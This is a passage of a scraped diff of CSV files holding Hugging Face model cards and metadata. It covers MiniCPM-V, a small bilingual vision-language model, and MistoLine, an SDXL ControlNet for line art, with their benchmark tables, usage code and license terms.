[""tcy6/VisRAG_Pipeline""], ""safetensors"": {""parameters"": {""BF16"": 3434965792}, ""total"": 3434965792}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-04 13:12:45+00:00"", ""cardData"": ""base_model:\n- openbmb/MiniCPM-V-2\ndatasets:\n- openbmb/VisRAG-Ret-Train-In-domain-data\n- openbmb/VisRAG-Ret-Train-Synthetic-data\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: feature-extraction\ntags:\n- VisRAG"", ""transformersInfo"": null, ""_id"": ""670d64c75759c2c673faeaca"", ""modelId"": ""openbmb/VisRAG-Ret"", ""usedStorage"": 6872003633}",1,,0,,0,,0,,0,"huggingface/InferenceSupport/discussions/new?title=openbmb/VisRAG-Ret&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bopenbmb%2FVisRAG-Ret%5D(%2Fopenbmb%2FVisRAG-Ret)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, tcy6/VisRAG_Pipeline",2
|
MiniCPM-V_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,189 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
openbmb/MiniCPM-V,"---
|
| 3 |
+
pipeline_tag: visual-question-answering
|
| 4 |
+
---
|
| 5 |
+
|
| 6 |
+
## MiniCPM-V
|
| 7 |
+
### News
|
| 8 |
+
- [2025.01.14] 🔥🔥 We open source [**MiniCPM-o 2.6**](https://huggingface.co/openbmb/MiniCPM-o-2_6), with significant performance improvement over **MiniCPM-V 2.6**, and support real-time speech-to-speech conversation and multimodal live streaming. Try it now.
|
| 9 |
+
- [2024.08.06] 🔥 We open-source [**MiniCPM-V 2.6**](https://huggingface.co/openbmb/MiniCPM-V-2_6), which outperforms GPT-4V on single image, multi-image and video understanding. It advances popular features of MiniCPM-Llama3-V 2.5, and can support real-time video understanding on iPad.
|
| 10 |
+
- [2024.05.20] 🔥 GPT-4V level multimodal model [**MiniCPM-Llama3-V 2.5**](https://huggingface.co/openbmb/MiniCPM-Llama3-V-2_5) is out.
|
| 11 |
+
- [2024.04.11] 🔥 [**MiniCPM-V 2.0**](https://huggingface.co/openbmb/MiniCPM-V-2) is out.
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
**MiniCPM-V** (i.e., OmniLMM-3B) is an efficient version with promising performance for deployment. The model is built based on SigLip-400M and [MiniCPM-2.4B](https://github.com/OpenBMB/MiniCPM/), connected by a perceiver resampler. Notable features of OmniLMM-3B include:
|
| 15 |
+
|
| 16 |
+
- ⚡️ **High Efficiency.**
|
| 17 |
+
|
| 18 |
+
MiniCPM-V can be **efficiently deployed on most GPU cards and personal computers**, and **even on end devices such as mobile phones**. In terms of visual encoding, we compress the image representations into 64 tokens via a perceiver resampler, which is significantly fewer than other LMMs based on MLP architecture (typically > 512 tokens). This allows OmniLMM-3B to operate with **much less memory cost and higher speed during inference**.
|
| 19 |
+
|
| 20 |
+
- 🔥 **Promising Performance.**
|
| 21 |
+
|
| 22 |
+
MiniCPM-V achieves **state-of-the-art performance** on multiple benchmarks (including MMMU, MME, and MMbech, etc) among models with comparable sizes, surpassing existing LMMs built on Phi-2. It even **achieves comparable or better performance than the 9.6B Qwen-VL-Chat**.
|
| 23 |
+
|
| 24 |
+
- 🙌 **Bilingual Support.**
|
| 25 |
+
|
| 26 |
+
MiniCPM-V is **the first end-deployable LMM supporting bilingual multimodal interaction in English and Chinese**. This is achieved by generalizing multimodal capabilities across languages, a technique from the ICLR 2024 spotlight [paper](https://arxiv.org/abs/2308.12038).
|
| 27 |
+
|
| 28 |
+
### Evaluation
|
| 29 |
+
|
| 30 |
+
<div align=""center"">
|
| 31 |
+
|
| 32 |
+
<table style=""margin: 0px auto;"">
|
| 33 |
+
<thead>
|
| 34 |
+
<tr>
|
| 35 |
+
<th align=""left"">Model</th>
|
| 36 |
+
<th>Size</th>
|
| 37 |
+
<th>MME</th>
|
| 38 |
+
<th nowrap=""nowrap"" >MMB dev (en)</th>
|
| 39 |
+
<th nowrap=""nowrap"" >MMB dev (zh)</th>
|
| 40 |
+
<th nowrap=""nowrap"" >MMMU val</th>
|
| 41 |
+
<th nowrap=""nowrap"" >CMMMU val</th>
|
| 42 |
+
</tr>
|
| 43 |
+
</thead>
|
| 44 |
+
<tbody align=""center"">
|
| 45 |
+
<tr>
|
| 46 |
+
<td align=""left"">LLaVA-Phi</td>
|
| 47 |
+
<td align=""right"">3.0B</td>
|
| 48 |
+
<td>1335</td>
|
| 49 |
+
<td>59.8</td>
|
| 50 |
+
<td>- </td>
|
| 51 |
+
<td>- </td>
|
| 52 |
+
<td>- </td>
|
| 53 |
+
</tr>
|
| 54 |
+
<tr>
|
| 55 |
+
<td nowrap=""nowrap"" align=""left"">MobileVLM</td>
|
| 56 |
+
<td align=""right"">3.0B</td>
|
| 57 |
+
<td>1289</td>
|
| 58 |
+
<td>59.6</td>
|
| 59 |
+
<td>- </td>
|
| 60 |
+
<td>- </td>
|
| 61 |
+
<td>- </td>
|
| 62 |
+
</tr>
|
| 63 |
+
<tr>
|
| 64 |
+
<td nowrap=""nowrap"" align=""left"" >Imp-v1</td>
|
| 65 |
+
<td align=""right"">3B</td>
|
| 66 |
+
<td>1434</td>
|
| 67 |
+
<td>66.5</td>
|
| 68 |
+
<td>- </td>
|
| 69 |
+
<td>- </td>
|
| 70 |
+
<td>- </td>
|
| 71 |
+
</tr>
|
| 72 |
+
<tr>
|
| 73 |
+
<td nowrap=""nowrap"" align=""left"" >Qwen-VL-Chat</td>
|
| 74 |
+
<td align=""right"" >9.6B</td>
|
| 75 |
+
<td>1487</td>
|
| 76 |
+
<td>60.6 </td>
|
| 77 |
+
<td>56.7 </td>
|
| 78 |
+
<td>35.9 </td>
|
| 79 |
+
<td>30.7 </td>
|
| 80 |
+
</tr>
|
| 81 |
+
<tr>
|
| 82 |
+
<td nowrap=""nowrap"" align=""left"" >CogVLM</td>
|
| 83 |
+
<td align=""right"">17.4B </td>
|
| 84 |
+
<td>1438 </td>
|
| 85 |
+
<td>63.7 </td>
|
| 86 |
+
<td>53.8 </td>
|
| 87 |
+
<td>32.1 </td>
|
| 88 |
+
<td>- </td>
|
| 89 |
+
</tr>
|
| 90 |
+
<tr>
|
| 91 |
+
<td nowrap=""nowrap"" align=""left"" ><b>MiniCPM-V</b></td>
|
| 92 |
+
<td align=""right"">3B </td>
|
| 93 |
+
<td>1452 </td>
|
| 94 |
+
<td>67.9 </td>
|
| 95 |
+
<td>65.3 </td>
|
| 96 |
+
<td>37.2 </td>
|
| 97 |
+
<td>32.1 </td>
|
| 98 |
+
</tr>
|
| 99 |
+
</tbody>
|
| 100 |
+
</table>
|
| 101 |
+
|
| 102 |
+
</div>
|
| 103 |
+
|
| 104 |
+
|
| 105 |
+
### Examples
|
| 106 |
+
<div align=""center"">
|
| 107 |
+
<table>
|
| 108 |
+
<tr>
|
| 109 |
+
<td>
|
| 110 |
+
<p>
|
| 111 |
+
<img src=""assets/Mushroom_en.gif"" width=""400""/>
|
| 112 |
+
</p>
|
| 113 |
+
</td>
|
| 114 |
+
<td>
|
| 115 |
+
<p>
|
| 116 |
+
<img src=""assets/Snake_en.gif"" width=""400""/>
|
| 117 |
+
</p>
|
| 118 |
+
</td>
|
| 119 |
+
</tr>
|
| 120 |
+
</table>
|
| 121 |
+
</div>
|
| 122 |
+
|
| 123 |
+
|
| 124 |
+
## Demo
|
| 125 |
+
Click here to try out the Demo of [MiniCPM-V](http://120.92.209.146:80).
|
| 126 |
+
|
| 127 |
+
## Deployment on Mobile Phone
|
| 128 |
+
Currently MiniCPM-V (i.e., OmniLMM-3B) can be deployed on mobile phones with Android and Harmony operating systems. 🚀 Try it out [here](https://github.com/OpenBMB/mlc-MiniCPM).
|
| 129 |
+
|
| 130 |
+
|
| 131 |
+
## Usage
|
| 132 |
+
Inference using Huggingface transformers on Nivdia GPUs or Mac with MPS (Apple silicon or AMD GPUs). Requirements tested on python 3.10:
|
| 133 |
+
```
|
| 134 |
+
Pillow==10.1.0
|
| 135 |
+
timm==0.9.10
|
| 136 |
+
torch==2.1.2
|
| 137 |
+
torchvision==0.16.2
|
| 138 |
+
transformers==4.36.0
|
| 139 |
+
sentencepiece==0.1.99
|
| 140 |
+
```
|
| 141 |
+
|
| 142 |
+
```python
|
| 143 |
+
# test.py
|
| 144 |
+
import torch
|
| 145 |
+
from PIL import Image
|
| 146 |
+
from transformers import AutoModel, AutoTokenizer
|
| 147 |
+
|
| 148 |
+
model = AutoModel.from_pretrained('openbmb/MiniCPM-V', trust_remote_code=True, torch_dtype=torch.bfloat16)
|
| 149 |
+
# For Nvidia GPUs support BF16 (like A100, H100, RTX3090)
|
| 150 |
+
model = model.to(device='cuda', dtype=torch.bfloat16)
|
| 151 |
+
# For Nvidia GPUs do NOT support BF16 (like V100, T4, RTX2080)
|
| 152 |
+
#model = model.to(device='cuda', dtype=torch.float16)
|
| 153 |
+
# For Mac with MPS (Apple silicon or AMD GPUs).
|
| 154 |
+
# Run with `PYTORCH_ENABLE_MPS_FALLBACK=1 python test.py`
|
| 155 |
+
#model = model.to(device='mps', dtype=torch.float16)
|
| 156 |
+
|
| 157 |
+
tokenizer = AutoTokenizer.from_pretrained('openbmb/MiniCPM-V', trust_remote_code=True)
|
| 158 |
+
model.eval()
|
| 159 |
+
|
| 160 |
+
image = Image.open('xx.jpg').convert('RGB')
|
| 161 |
+
question = 'What is in the image?'
|
| 162 |
+
msgs = [{'role': 'user', 'content': question}]
|
| 163 |
+
|
| 164 |
+
res, context, _ = model.chat(
|
| 165 |
+
image=image,
|
| 166 |
+
msgs=msgs,
|
| 167 |
+
context=None,
|
| 168 |
+
tokenizer=tokenizer,
|
| 169 |
+
sampling=True,
|
| 170 |
+
temperature=0.7
|
| 171 |
+
)
|
| 172 |
+
print(res)
|
| 173 |
+
```
|
| 174 |
+
|
| 175 |
+
Please look at [GitHub](https://github.com/OpenBMB/OmniLMM) for more detail about usage.
|
| 176 |
+
|
| 177 |
+
## License
|
| 178 |
+
|
| 179 |
+
#### Model License
|
| 180 |
+
* The code in this repo is released under the [Apache-2.0](https://github.com/OpenBMB/MiniCPM/blob/main/LICENSE) License.
|
| 181 |
+
* The usage of MiniCPM-V series model weights must strictly follow [MiniCPM Model License.md](https://github.com/OpenBMB/MiniCPM/blob/main/MiniCPM%20Model%20License.md).
|
| 182 |
+
* The models and weights of MiniCPM are completely free for academic research. after filling out a [""questionnaire""](https://modelbest.feishu.cn/share/base/form/shrcnpV5ZT9EJ6xYjh3Kx0J6v8g) for registration, are also available for free commercial use.
|
| 183 |
+
|
| 184 |
+
|
| 185 |
+
#### Statement
|
| 186 |
+
* As a LLM, MiniCPM-V generates contents by learning a large mount of texts, but it cannot comprehend, express personal opinions or make value judgement. Anything generated by MiniCPM-V does not represent the views and positions of the model developers
|
| 187 |
+
* We will not be liable for any problems arising from the use of the MinCPM-V open Source model, including but not limited to data security issues, risk of public opinion, or any risks and problems arising from the misdirection, misuse, dissemination or misuse of the model.
|
| 188 |
+
|
| 189 |
+
","{""id"": ""openbmb/MiniCPM-V"", ""author"": ""openbmb"", ""sha"": ""7cf70e2964c456f423666e2c183bcd4c87f4fd4b"", ""last_modified"": ""2025-01-15 10:37:49+00:00"", ""created_at"": ""2024-01-30 14:38:14+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 20935, ""downloads_all_time"": null, ""likes"": 173, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""minicpmv"", ""feature-extraction"", ""visual-question-answering"", ""custom_code"", ""arxiv:2308.12038"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""pipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""MiniCPMV""], ""auto_map"": {""AutoConfig"": ""configuration_minicpm.MiniCPMVConfig"", ""AutoModel"": ""modeling_minicpmv.MiniCPMV"", ""AutoModelForCausalLM"": ""modeling_minicpmv.MiniCPMV""}, ""model_type"": ""minicpmv"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": null, ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/Mushroom_en.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/Snake_en.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/\u8611\u83c7_cn.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/\u86c7_cn.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpmv.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='resampler.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Demo750/XGBoost_Gaze"", ""mohan007/autism_exp_with_minicpm_o_2_6"", ""AhmedAlmaghz/github-repo-test"", ""ManishThota/GSoC-Super-Rapid-Annotator"", ""Jeel05/large-model-space"", ""ABharatSai/PicQ"", ""DHEIVER/openbmb-MiniCPM-o-2_6"", ""ragavendran-r/MiniCPM-test""], ""safetensors"": {""parameters"": {""BF16"": 3434965792}, ""total"": 3434965792}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-15 10:37:49+00:00"", ""cardData"": ""pipeline_tag: visual-question-answering"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""_id"": ""65b909d6dd94007789899683"", ""modelId"": ""openbmb/MiniCPM-V"", ""usedStorage"": 6878474344}",0,,0,,0,,0,,0,"ABharatSai/PicQ, AhmedAlmaghz/github-repo-test, DHEIVER/openbmb-MiniCPM-o-2_6, Demo750/XGBoost_Gaze, Jeel05/large-model-space, ManishThota/GSoC-Super-Rapid-Annotator, huggingface/InferenceSupport/discussions/new?title=openbmb/MiniCPM-V&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bopenbmb%2FMiniCPM-V%5D(%2Fopenbmb%2FMiniCPM-V)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mohan007/autism_exp_with_minicpm_o_2_6, ragavendran-r/MiniCPM-test",9
|
MistoLine_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,172 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
TheMistoAI/MistoLine,"---
|
| 3 |
+
license: openrail++
|
| 4 |
+
tags:
|
| 5 |
+
- art
|
| 6 |
+
- stable diffusion
|
| 7 |
+
- ControlNet
|
| 8 |
+
- SDXL
|
| 9 |
+
- Diffusion-XL
|
| 10 |
+
pipeline_tag: text-to-image
|
| 11 |
+
---
|
| 12 |
+
# MistoLine
|
| 13 |
+
## Control Every Line!
|
| 14 |
+
|
| 15 |
+

|
| 16 |
+
[GitHub Repo](https://github.com/TheMistoAI/MistoLine)
|
| 17 |
+
|
| 18 |
+
## NEWS!!!!! Anyline-preprocessor is released!!!!
|
| 19 |
+
[Anyline Repo](https://github.com/TheMistoAI/ComfyUI-Anyline)
|
| 20 |
+
|
| 21 |
+
**MistoLine: A Versatile and Robust SDXL-ControlNet Model for Adaptable Line Art Conditioning.**
|
| 22 |
+
|
| 23 |
+
MistoLine is an SDXL-ControlNet model that can adapt to any type of line art input, demonstrating high accuracy and excellent stability. It can generate high-quality images (with a short side greater than 1024px) based on user-provided line art of various types, including hand-drawn sketches, different ControlNet line preprocessors, and model-generated outlines. MistoLine eliminates the need to select different ControlNet models for different line preprocessors, as it exhibits strong generalization capabilities across diverse line art conditions.
|
| 24 |
+
|
| 25 |
+
We developed MistoLine by employing a novel line preprocessing algorithm **[Anyline](https://github.com/TheMistoAI/ComfyUI-Anyline)** and retraining the ControlNet model based on the Unet of stabilityai/ stable-diffusion-xl-base-1.0, along with innovations in large model training engineering. MistoLine showcases superior performance across
|
| 26 |
+
different types of line art inputs, surpassing existing ControlNet models in terms of detail restoration, prompt alignment, and stability, particularly in more complex scenarios.
|
| 27 |
+
|
| 28 |
+
MistoLine maintains consistency with the ControlNet architecture released by @lllyasviel, as illustrated in the following schematic diagram:
|
| 29 |
+

|
| 30 |
+

|
| 31 |
+
*reference:https://github.com/lllyasviel/ControlNet*
|
| 32 |
+
|
| 33 |
+
More information about ControlNet can be found in the following references:
|
| 34 |
+
https://github.com/lllyasviel/ControlNet
|
| 35 |
+
https://huggingface.co/docs/diffusers/main/en/api/pipelines/controlnet_sdxl
|
| 36 |
+
|
| 37 |
+
The model is compatible with most SDXL models, except for PlaygroundV2.5, CosXL, and SDXL-Lightning(maybe). It can be used in conjunction with LCM and other ControlNet models.
|
| 38 |
+
|
| 39 |
+
The following usage of this model is not allowed:
|
| 40 |
+
* Violating laws and regulations
|
| 41 |
+
* Harming or exploiting minors
|
| 42 |
+
* Creating and spreading false information
|
| 43 |
+
* Infringing on others' privacy
|
| 44 |
+
* Defaming or harassing others
|
| 45 |
+
* Automated decision-making that harms others' legal rights
|
| 46 |
+
* Discrimination based on social behavior or personal characteristics
|
| 47 |
+
* Exploiting the vulnerabilities of specific groups to mislead their behavior
|
| 48 |
+
* Discrimination based on legally protected characteristics
|
| 49 |
+
* Providing medical advice and diagnostic results
|
| 50 |
+
* Improperly generating and using information for purposes such as law enforcement and immigration
|
| 51 |
+
|
| 52 |
+
If you use or distribute this model for commercial purposes, you must comply with the following conditions:
|
| 53 |
+
1. Clearly acknowledge the contribution of TheMisto.ai to this model in the documentation, website, or other prominent and visible locations of your product.
|
| 54 |
+
Example: ""This product uses the MistoLine-SDXL-ControlNet developed by TheMisto.ai.""
|
| 55 |
+
2. If your product includes about screens, readme files, or other similar display areas, you must include the above attribution information in those areas.
|
| 56 |
+
3. If your product does not have the aforementioned areas, you must include the attribution information in other reasonable locations within the product to ensure that end-users can notice it.
|
| 57 |
+
4. You must not imply in any way that TheMisto.ai endorses or promotes your product. The use of the attribution information is solely to indicate the origin of this model.
|
| 58 |
+
If you have any questions about how to provide attribution in specific cases, please contact info@themisto.ai.
|
| 59 |
+
|
| 60 |
+
署名条款
|
| 61 |
+
如果您在商业用途中使用或分发本模型,您必须满足以下条件:
|
| 62 |
+
1. 在产品的文档,网站,或其他主要可见位置,明确提及 TheMisto.ai 对本软件的贡献。
|
| 63 |
+
示例: ""本产品使用了 TheMisto.ai 开发的 MistoLine-SDXL-ControlNet。""
|
| 64 |
+
2. 如果您的产品包含有关屏幕,说明文件,或其他类似的显示区域,您必须在这些区域中包含上述署名信息。
|
| 65 |
+
3. 如果您的产品没有上述区域,您必须在产品的其他合理位置包含署名信息,以确保最终用户能够注意到。
|
| 66 |
+
4. 您不得以任何方式暗示 TheMisto.ai 为您的产品背书或促销。署名信息的使用仅用于表明本模型的来源。
|
| 67 |
+
如果您对如何在特定情况下提供署名有任何疑问,请联系info@themisto.ai。
|
| 68 |
+
|
| 69 |
+
The model output is not censored and the authors do not endorse the opinions in the generated content. Use at your own risk.
|
| 70 |
+
|
| 71 |
+
## Apply with Different Line Preprocessors
|
| 72 |
+

|
| 73 |
+
|
| 74 |
+
## Compere with Other Controlnets
|
| 75 |
+

|
| 76 |
+
|
| 77 |
+
## Application Examples
|
| 78 |
+
|
| 79 |
+
### Sketch Rendering
|
| 80 |
+
*The following case only utilized MistoLine as the controlnet:*
|
| 81 |
+

|
| 82 |
+
|
| 83 |
+
### Model Rendering
|
| 84 |
+
*The following case only utilized Anyline as the preprocessor and MistoLine as the controlnet.*
|
| 85 |
+

|
| 86 |
+
|
| 87 |
+
## ComfyUI Recommended Parameters
|
| 88 |
+
```
|
| 89 |
+
sampler steps:30
|
| 90 |
+
CFG:7.0
|
| 91 |
+
sampler_name:dpmpp_2m_sde
|
| 92 |
+
scheduler:karras
|
| 93 |
+
denoise:0.93
|
| 94 |
+
controlnet_strength:1.0
|
| 95 |
+
stargt_percent:0.0
|
| 96 |
+
end_percent:0.9
|
| 97 |
+
```
|
| 98 |
+
## Diffusers pipeline
|
| 99 |
+
Make sure to first install the libraries:
|
| 100 |
+
```
|
| 101 |
+
pip install accelerate transformers safetensors opencv-python diffusers
|
| 102 |
+
```
|
| 103 |
+
And then we're ready to go:
|
| 104 |
+
```
|
| 105 |
+
from diffusers import ControlNetModel, StableDiffusionXLControlNetPipeline, AutoencoderKL
|
| 106 |
+
from diffusers.utils import load_image
|
| 107 |
+
from PIL import Image
|
| 108 |
+
import torch
|
| 109 |
+
import numpy as np
|
| 110 |
+
import cv2
|
| 111 |
+
|
| 112 |
+
prompt = ""aerial view, a futuristic research complex in a bright foggy jungle, hard lighting""
|
| 113 |
+
negative_prompt = 'low quality, bad quality, sketches'
|
| 114 |
+
|
| 115 |
+
image = load_image(""https://huggingface.co/datasets/hf-internal-testing/diffusers-images/resolve/main/sd_controlnet/hf-logo.png"")
|
| 116 |
+
|
| 117 |
+
controlnet_conditioning_scale = 0.5
|
| 118 |
+
|
| 119 |
+
controlnet = ControlNetModel.from_pretrained(
|
| 120 |
+
""TheMistoAI/MistoLine"",
|
| 121 |
+
torch_dtype=torch.float16,
|
| 122 |
+
variant=""fp16"",
|
| 123 |
+
)
|
| 124 |
+
vae = AutoencoderKL.from_pretrained(""madebyollin/sdxl-vae-fp16-fix"", torch_dtype=torch.float16)
|
| 125 |
+
pipe = StableDiffusionXLControlNetPipeline.from_pretrained(
|
| 126 |
+
""stabilityai/stable-diffusion-xl-base-1.0"",
|
| 127 |
+
controlnet=controlnet,
|
| 128 |
+
vae=vae,
|
| 129 |
+
torch_dtype=torch.float16,
|
| 130 |
+
)
|
| 131 |
+
pipe.enable_model_cpu_offload()
|
| 132 |
+
|
| 133 |
+
image = np.array(image)
|
| 134 |
+
image = cv2.Canny(image, 100, 200)
|
| 135 |
+
image = image[:, :, None]
|
| 136 |
+
image = np.concatenate([image, image, image], axis=2)
|
| 137 |
+
image = Image.fromarray(image)
|
| 138 |
+
|
| 139 |
+
images = pipe(
|
| 140 |
+
prompt, negative_prompt=negative_prompt, image=image, controlnet_conditioning_scale=controlnet_conditioning_scale,
|
| 141 |
+
).images
|
| 142 |
+
|
| 143 |
+
images[0].save(f""hug_lab.png"")
|
| 144 |
+
```
|
| 145 |
+
|
| 146 |
+
|
| 147 |
+
## Checkpoints
|
| 148 |
+
* mistoLine_rank256.safetensors : General usage version, for ComfyUI and AUTOMATIC1111-WebUI.
|
| 149 |
+
* mistoLine_fp16.safetensors : FP16 weights, for ComfyUI and AUTOMATIC1111-WebUI.
|
| 150 |
+
|
| 151 |
+
## !!!mistoLine_rank256.safetensors better than mistoLine_fp16.safetensors
|
| 152 |
+
## !!!mistoLine_rank256.safetensors 表现更加出色!!
|
| 153 |
+
|
| 154 |
+
## ComfyUI Usage
|
| 155 |
+

|
| 156 |
+
|
| 157 |
+
## 中国(大陆地区)便捷下载地址:
|
| 158 |
+
链接:https://pan.baidu.com/s/1DbZWmGJ40Uzr3Iz9RNBG_w?pwd=8mzs
|
| 159 |
+
提取码:8mzs
|
| 160 |
+
|
| 161 |
+
## Citation
|
| 162 |
+
```
|
| 163 |
+
@misc{
|
| 164 |
+
title={Adding Conditional Control to Text-to-Image Diffusion Models},
|
| 165 |
+
author={Lvmin Zhang, Anyi Rao, Maneesh Agrawala},
|
| 166 |
+
year={2023},
|
| 167 |
+
eprint={2302.05543},
|
| 168 |
+
archivePrefix={arXiv},
|
| 169 |
+
primaryClass={cs.CV}
|
| 170 |
+
}
|
| 171 |
+
```
|
| 172 |
+
